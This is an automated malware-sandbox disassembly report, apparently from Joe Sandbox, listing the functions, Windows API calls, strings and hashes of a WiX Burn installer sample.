                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00875266,?,?,00000000,?,?), ref: 00874380
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00875266,?,?,00000000,?,?), ref: 008743D0
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00875266,?,?,00000000,?,?), ref: 008743DA
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00875266,?,?,00000000,?,?), ref: 008743EE
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00875266,?,?,00000000,?,?), ref: 008743FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                            • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                            • API String ID: 3039292287-3209860532
                                                            • Opcode ID: 7111127c93fc96d3851c09acb9c8e70b2a4decbce4e15da5f837c3869198bb5e
                                                            • Instruction ID: 194fb7f9f51c4a0d2232ce3cb619004f77fb96ffde5ab93d66769bd7b2a771de
                                                            • Opcode Fuzzy Hash: 7111127c93fc96d3851c09acb9c8e70b2a4decbce4e15da5f837c3869198bb5e
                                                            • Instruction Fuzzy Hash: 6951A471A40215BEC724DB68CC86F9A7B6CFF04760F104125FA18E7390D7B4E950DBA5
                                                            Function 0087C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1505 87c28f-87c2c1 1506 87c2c3-87c2e1 CreateFileW 1505->1506 1507 87c32b-87c347 GetCurrentProcess * 2 DuplicateHandle 1505->1507 1510 87c2e7-87c2f1 GetLastError 1506->1510 1511 87c383-87c389 1506->1511 1508 87c381 1507->1508 1509 87c349-87c353 GetLastError 1507->1509 1508->1511 1514 87c355-87c35e 1509->1514 1515 87c360 1509->1515 1516 87c2f3-87c2fc 1510->1516 1517 87c2fe 1510->1517 1512 87c393 1511->1512 1513 87c38b-87c391 1511->1513 1520 87c395-87c3a3 SetFilePointerEx 1512->1520 1513->1520 1514->1515 1521 87c367-87c37f call 873821 1515->1521 1522 87c362 1515->1522 1516->1517 1518 87c305-87c318 call 873821 1517->1518 1519 87c300 1517->1519 1533 87c31d-87c326 call 8b0237 1518->1533 1519->1518 1524 87c3a5-87c3af GetLastError 1520->1524 1525 87c3da-87c3e0 1520->1525 1521->1533 1522->1521 1528 87c3b1-87c3ba 1524->1528 1529 87c3bc 1524->1529 1530 87c3e2-87c3e6 call 891741 1525->1530 1531 87c3fe-87c404 1525->1531 1528->1529 1534 87c3c3-87c3d8 call 873821 1529->1534 1535 87c3be 1529->1535 1539 87c3eb-87c3ef 1530->1539 1533->1531 1543 87c3f6-87c3fd call 8b0237 1534->1543 1535->1534 1539->1531 1542 87c3f1 1539->1542 1542->1543 1543->1531
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0087C47F,00875405,?,?,00875445), ref: 0087C2D6
                                                            • GetLastError.KERNEL32(?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C2E7
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?), ref: 0087C336
                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C33C
                                                            • DuplicateHandle.KERNELBASE(00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C33F
                                                            • GetLastError.KERNEL32(?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C349
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C39B
                                                            • GetLastError.KERNEL32(?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C3A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                            • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                            • API String ID: 2619879409-373955632
                                                            • Opcode ID: 8aa905eb7a00f2eddf3ce133af66945f7811d2e2398a9ccf71bf754c9babfff4
                                                            • Instruction ID: 1ff18396e4f3afcebae6442184fa982cb141c6d27e9dff0d009e5acaf9941da6
                                                            • Opcode Fuzzy Hash: 8aa905eb7a00f2eddf3ce133af66945f7811d2e2398a9ccf71bf754c9babfff4
                                                            • Instruction Fuzzy Hash: 2A41E836540201ABDB219F598C49E5B7BA5FBC4720F21C12DFE28EB386DB71C801DB61
                                                            Function 008B2AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1546 8b2af7-8b2b17 call 873838 1549 8b2b1d-8b2b2b call 8b4a6c 1546->1549 1550 8b2c21-8b2c25 1546->1550 1554 8b2b30-8b2b4f GetProcAddress 1549->1554 1552 8b2c2f-8b2c35 1550->1552 1553 8b2c27-8b2c2a call 8b5636 1550->1553 1553->1552 1556 8b2b51 1554->1556 1557 8b2b56-8b2b6f GetProcAddress 1554->1557 1556->1557 1558 8b2b71 1557->1558 1559 8b2b76-8b2b8f GetProcAddress 1557->1559 1558->1559 1560 8b2b91 1559->1560 1561 8b2b96-8b2baf GetProcAddress 1559->1561 1560->1561 1562 8b2bb1 1561->1562 1563 8b2bb6-8b2bcf GetProcAddress 1561->1563 1562->1563 1564 8b2bd1 1563->1564 1565 8b2bd6-8b2bef GetProcAddress 1563->1565 1564->1565 1566 8b2bf1 1565->1566 1567 8b2bf6-8b2c10 GetProcAddress 1565->1567 1566->1567 1568 8b2c12 1567->1568 1569 8b2c17 1567->1569 1568->1569 1569->1550
                                                            APIs
                                                              • Part of subcall function 00873838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00873877
                                                              • Part of subcall function 00873838: GetLastError.KERNEL32 ref: 00873881
                                                              • Part of subcall function 008B4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008B4A9D
                                                            • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 008B2B41
                                                            • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 008B2B61
                                                            • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 008B2B81
                                                            • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 008B2BA1
                                                            • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 008B2BC1
                                                            • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 008B2BE1
                                                            • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 008B2C01
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLast$DirectorySystem
                                                            • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                            • API String ID: 2510051996-1735120554
                                                            • Opcode ID: 8d9168c8772bb98897a364cc22d2e6ec91fa3a741ec5599c321773ad54cf48fe
                                                            • Instruction ID: 8f4b62a91d8ffad28b14c1097f08c90278fce8c0ff1ddfbbf86143094a865c5a
                                                            • Opcode Fuzzy Hash: 8d9168c8772bb98897a364cc22d2e6ec91fa3a741ec5599c321773ad54cf48fe
                                                            • Instruction Fuzzy Hash: 3D31C4B0942208EBDB119F21FD06B6A7BA0FB34755F02032BE414967B0EBB5C855DF54
                                                            Function 00891741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0087C3EB,?,00000000,?,0087C47F), ref: 00891778
                                                            • GetLastError.KERNEL32(?,0087C3EB,?,00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 00891781
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorEventLast
                                                            • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                            • API String ID: 545576003-938279966
                                                            • Opcode ID: 34e77328cd85ee0c95f2fde799769ad59b38dd4388b5416f12e69a70ea77285a
                                                            • Instruction ID: f8583f84c603eba9c1d5a8faaddc93e7d7265914d35e036d3c6b255b5bfcaa10
                                                            • Opcode Fuzzy Hash: 34e77328cd85ee0c95f2fde799769ad59b38dd4388b5416f12e69a70ea77285a
                                                            • Instruction Fuzzy Hash: ED210A77D8463B76DF2136994C4AF2B6A5CFB007A4B064635BD20FB280E774DC0085E2
                                                            Function 008AFCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 008AFCD6
                                                            • GetProcAddress.KERNEL32(SystemFunction041), ref: 008AFCE8
                                                            • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 008AFD2B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 008AFD3F
                                                            • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 008AFD77
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 008AFD8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLast
                                                            • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                            • API String ID: 4214558900-3191127217
                                                            • Opcode ID: 3151123cc810e52da472a0fbaa85eda064ae8367b7edbe1f17d983ad54cf1b2f
                                                            • Instruction ID: 78aed266766afa2990abc67caf80acde2c6b560db7e942819669670b26a8756c
                                                            • Opcode Fuzzy Hash: 3151123cc810e52da472a0fbaa85eda064ae8367b7edbe1f17d983ad54cf1b2f
                                                            • Instruction Fuzzy Hash: 15215332942236DBE7226B96BD067567BA0FB01B55F170337EE10E6762FB748C00DA91
                                                            Function 008908C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 008908F2
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0089090A
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0089090F
                                                            • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00890912
                                                            • GetLastError.KERNEL32(?,?), ref: 0089091C
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0089098B
                                                            • GetLastError.KERNEL32(?,?), ref: 00890998
                                                            Strings
                                                            • Failed to duplicate handle to cab container., xrefs: 0089094A
                                                            • Failed to add virtual file pointer for cab container., xrefs: 00890971
                                                            • <the>.cab, xrefs: 008908EB
                                                            • cabextract.cpp, xrefs: 00890940, 008909BC
                                                            • Failed to open cabinet file: %hs, xrefs: 008909C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                            • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                            • API String ID: 3030546534-3446344238
                                                            • Opcode ID: ad43a9fe470ff5bafd40fe2a1660231a110d304b012b14e4acef9488bf88dcf1
                                                            • Instruction ID: e5ceb03473a23ffeb39607272cde9afcd7fdb02f35b991c71262de9faf711f71
                                                            • Opcode Fuzzy Hash: ad43a9fe470ff5bafd40fe2a1660231a110d304b012b14e4acef9488bf88dcf1
                                                            • Instruction Fuzzy Hash: 2131CF3294163ABFEB216A998C49F9ABF68FF04760F154225FE18F7251D7709D008AE1
                                                            Function 00886A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00874E11,?,?), ref: 00886A77
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,00874E11,?,?), ref: 00886A7D
                                                            • DuplicateHandle.KERNELBASE(00000000,?,?,00874E11,?,?), ref: 00886A80
                                                            • GetLastError.KERNEL32(?,?,00874E11,?,?), ref: 00886A8A
                                                            • CloseHandle.KERNEL32(000000FF,?,00874E11,?,?), ref: 00886B03
                                                            Strings
                                                            • %ls -%ls=%u, xrefs: 00886AD7
                                                            • burn.filehandle.attached, xrefs: 00886AD0
                                                            • core.cpp, xrefs: 00886AAE
                                                            • Failed to duplicate file handle for attached container., xrefs: 00886AB8
                                                            • Failed to append the file handle to the command line., xrefs: 00886AEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                            • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                            • API String ID: 4224961946-4196573879
                                                            • Opcode ID: 1d06a798512a2433d3f48d58813093f6ae5d2466d360c1f1402d0c96b7c13648
                                                            • Instruction ID: d0674f038ec124b789fceaa8806a160aae6a6e9027c95c0624d406a03d14c5c3
                                                            • Opcode Fuzzy Hash: 1d06a798512a2433d3f48d58813093f6ae5d2466d360c1f1402d0c96b7c13648
                                                            • Instruction Fuzzy Hash: EF117232940625BBCB14AAA89D05E9E7B68FF05770F108355F924F72D0E7B49D109791
                                                            Function 008B32F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 008B3309
                                                            • SysAllocString.OLEAUT32(?), ref: 008B3325
                                                            • VariantClear.OLEAUT32(?), ref: 008B33AC
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B33B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 760788290-3482516102
                                                            • Opcode ID: b4185fb8012f92a9f4aed368cbc66ef1c45f509e32d5fe9be858fc1085db37bd
                                                            • Instruction ID: 2509cd9bebc469e129c6123ec5abecf0300106fae0e4b8d3c75fa920c0d47c3a
                                                            • Opcode Fuzzy Hash: b4185fb8012f92a9f4aed368cbc66ef1c45f509e32d5fe9be858fc1085db37bd
                                                            • Instruction Fuzzy Hash: 5D215E31901219AFCB119B98D848EEFBBF9FF48715F154258F905EB310DB719E008B91
                                                            Function 008B0879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcessToken.ADVAPI32(?,00000008,?,008753BD,00000000,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B0897
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08A1
                                                            • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08D3
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08EC
                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B092B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                            • String ID: procutil.cpp
                                                            • API String ID: 4040495316-1178289305
                                                            • Opcode ID: 8aa9327ec2f92ca947414f023d6b23c265d1f5e1270dbe573504448e24fd1b62
                                                            • Instruction ID: 17fa9d8652914305fa756c21b6e5d27109620e9bf39a5b6dd90c2e9c47d6a7a3
                                                            • Opcode Fuzzy Hash: 8aa9327ec2f92ca947414f023d6b23c265d1f5e1270dbe573504448e24fd1b62
                                                            • Instruction Fuzzy Hash: C1219232D40629ABD721AB959C05AEFFFA8FF10711F114166AD54EB360D3708E009ED1
                                                            Function 00886B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 00886B49
                                                            • CloseHandle.KERNEL32(00000000), ref: 00886BB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                            • API String ID: 3498533004-3263533295
                                                            • Opcode ID: de69b3ba5bb9c0d2f6f20c4648a135ec7589d8980290b316f1e812b63dc0bd9a
                                                            • Instruction ID: 7a9fa973cf66e4dc2bbd1006776e83d073a49ae156267bb99340060f5818b70d
                                                            • Opcode Fuzzy Hash: de69b3ba5bb9c0d2f6f20c4648a135ec7589d8980290b316f1e812b63dc0bd9a
                                                            • Instruction Fuzzy Hash: 0E11D631A40614BBCB206A68DC05F9B7BA8FB45734F054354FD38EB3D1E7B494214791
                                                            Function 008B3565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 008B3574
                                                            • InterlockedIncrement.KERNEL32(008DB6C8), ref: 008B3591
                                                            • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,008DB6B8,?,?,?,?,?,?), ref: 008B35AC
                                                            • CLSIDFromProgID.OLE32(MSXML.DOMDocument,008DB6B8,?,?,?,?,?,?), ref: 008B35B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FromProg$IncrementInitializeInterlocked
                                                            • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                            • API String ID: 2109125048-2356320334
                                                            • Opcode ID: c5e569e8281a8c9f15c2ecb27c2eb40c2d797bde2e2e895d2766c62e3a85d96b
                                                            • Instruction ID: 2a3a1ebbd29947df1e36d93bb4d561768c8affa4a54a7ccb8420a3dfba0a231d
                                                            • Opcode Fuzzy Hash: c5e569e8281a8c9f15c2ecb27c2eb40c2d797bde2e2e895d2766c62e3a85d96b
                                                            • Instruction Fuzzy Hash: 9DF0E53074122AA7C3301FA27D08B872FA5FB90B64F01072AE950C2350E7A0C94586B0
                                                            Function 008B4A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008B4A9D
                                                            • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 008B4ACA
                                                            • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 008B4AF6
                                                            • GetLastError.KERNEL32(00000000,008BB7A0,?,00000000,?,00000000,?,00000000), ref: 008B4B34
                                                            • GlobalFree.KERNEL32(00000000), ref: 008B4B65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Global$AllocFree
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 1145190524-2967768451
                                                            • Opcode ID: 7bb3efb783a3ebc72f54acd9f9311ee288ff74ee06844c68a3544cdb374fc73e
                                                            • Instruction ID: 16df7e0c4bdac14503048b9a0bf66f53e8d551bfc91de03bf509bd367205e789
                                                            • Opcode Fuzzy Hash: 7bb3efb783a3ebc72f54acd9f9311ee288ff74ee06844c68a3544cdb374fc73e
                                                            • Instruction Fuzzy Hash: 8B31AF36A40239ABC7219AD98C42FEFBBA8FF44760F114265EE54E7342E730DC0096E5
                                                            Function 00890A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00890B27
                                                            • GetLastError.KERNEL32(?,?,?), ref: 00890B31
                                                            Strings
                                                            • Invalid seek type., xrefs: 00890ABD
                                                            • cabextract.cpp, xrefs: 00890B55
                                                            • Failed to move file pointer 0x%x bytes., xrefs: 00890B62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
